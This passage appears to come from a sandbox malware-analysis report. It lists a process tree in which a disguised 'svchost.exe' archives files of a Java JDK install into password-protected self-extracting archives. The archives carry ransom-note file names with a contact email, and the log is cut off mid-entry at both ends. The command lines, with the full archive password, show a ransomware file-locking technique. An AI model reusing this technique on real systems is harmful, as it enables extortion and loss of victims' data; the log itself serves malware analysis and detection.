  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2612
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2312
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:344
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2768
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2924
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1688
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2908
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1800
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2028
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2232
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1576
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1740
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2316
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2904
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2636
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2260
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2820
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1528
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2212
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\msvkp\svchost.exe
